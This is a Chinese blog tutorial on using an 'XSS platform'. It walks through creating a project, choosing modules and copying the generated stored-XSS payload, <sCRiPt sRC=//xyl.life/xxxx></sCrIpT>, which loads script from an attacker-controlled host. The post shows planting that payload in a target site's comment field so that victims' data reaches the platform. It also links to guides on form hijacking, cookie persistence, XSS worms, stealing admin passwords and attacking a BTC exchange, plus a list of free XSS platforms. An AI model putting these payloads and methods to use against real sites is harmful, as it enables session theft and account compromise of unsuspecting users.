【注意：此文章为博主原创文章！转载需注意，请带原文链接，至少也要是txt格式！】

请仔细查看本文，相信你讲对XSS平台有另类的了解，注意是【仔细查看本文】！！！
首先登录XSS平台，进入 Xss平台之后是如下界面。  (以下所有图片点击都可以查看大图或原图)。

登录进去后，首先要创建一个项目。这个项目主要是为了标记你想测试某个网站。如下图：

点击创建项目之后如下图：

然后点击下一步。然后配置项目：

这里不要太多模块都勾选，非常非常容易导致JS报错，如果报错，那么可能你就收不到对方的中招信息了。尽量只勾选一个或两个。

然后点击下一步，就完成了。完成后如下图：

这里说明一下，注意上方的红框，这里最好是复制上方第一个红色方框中的内容，例如：

<sCRiPt sRC=//xyl.life/xxxx></sCrIpT>  这个就是项目给你的代码，这里说一下你需要测试的网站是https的网站且你的XSS平台也支持https那么你可以把这个代码改成 <sCRiPt sRC=https://xyl.life/xxxx></sCrIpT> 这样。

 

这里还要说明一下，其实 <sCRiPt sRC=//xyl.life/xxxx></sCrIpT> 当网站前面是//的时候，代码会自动适配网站，如果对方网站是https的那么代码会自动从https加载，如果对方网站是http的那么代码会从http加载。所以，，，默认的这种方式是最好的插入方式。(xss平台不需要支持https，xss项目代码支持https就好，这句话自行理解)

 

如何从其他地方查看上面的项目代码呢？如下图：

至此最基本的XSS平台项目及使用方法建立完毕了，剩下就是拿你自己的项目代码来做测试喽。例如上面我项目对应的代码是：<sCRiPt sRC=//xsspt.com/xxxx></sCrIpT>

假设我想测试留言的地方就可以如下图：

然后如果对方中招了，那么你的XSS平台就会有收到对方的信息。好了，这是最基本的使用方法。

 

下面是本人整理的一些XSS平台进阶的使用方法：

图片XSS 获取对方后台 使用讲解    https://woj.app/1785.html

XSS 之 form表单劫持(通用明文记录)    https://woj.app/1684.html (这里推荐使用平台最新表单劫持插件，无需设置，直接可用)

xss获取后台二级密码 – URL跳转 (地址栏不变)    https://woj.app/1820.html

后台(内网)打穿神器→xss蠕虫    https://woj.app/2173.html

xss平台持久cookie说明 keepsession说明    https://woj.app/1907.html

不用cookie 一个储存XSS对“某btc平台”攻城略地  https://woj.app/3035.html

--------------------------XSS经典案例之一----------------------

百度搜索框反射XSS分析 (2015年案例)    https://woj.app/2089.html

一波三折之某站点反射XSS (绕WAF防御)    https://woj.app/1603.html

京东驳回的一枚轻易paylod而不易exploit的xss的开发过程    https://woj.app/1590.html

 

网络上免费XSS平台集合：https://sec.ly.com/xsspt.txt     这里全部都是网络上公开的，不公开的，免费的收费的XSS平台集合，任君选择。

 

https://woj.app/liuyan/